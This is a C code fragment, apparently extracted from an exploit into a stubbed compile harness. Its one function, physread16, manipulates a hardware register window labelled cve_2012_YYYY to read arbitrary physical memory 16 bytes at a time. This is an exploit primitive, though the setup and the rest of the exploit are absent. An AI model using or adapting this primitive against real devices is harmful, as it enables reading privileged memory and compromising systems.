
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint32_t ;


 int* cve_2012_YYYY ;
 int exit (int) ;
 int memset (int*,int ,int) ;
 int poke_byte (int*,int,int) ;
 int printf (char*) ;

__attribute__((used)) static void physread16(volatile uint32_t *m, uint32_t target, uint32_t *buffer)
{
  if (1) {
    uint32_t ofs = (target & 0x3ffff)/4, i;

    if (target & 0xf) {
      printf("[ ] Function requires 16-byte alignment for input!\n");
      exit(-1);
    }

    cve_2012_YYYY[0xf00/4] = 0xb | ((target >> 18) << 10);
    memset(buffer, 0, 16);
    for (i = 0; i < 4; ++i) {
      uint32_t shift = i * 8;
      poke_byte(cve_2012_YYYY, 0x204, i);
      buffer[0] |= (m[ofs/4] & 0xff) << shift;
      buffer[1] |= ((m[ofs/4] & 0xff00) >> 8) << shift;
      buffer[2] |= ((m[ofs/4] & 0xff0000) >> 16) << shift;
      buffer[3] |= ((m[ofs/4] & 0xff000000) >> 24) << shift;
    }
  }
}
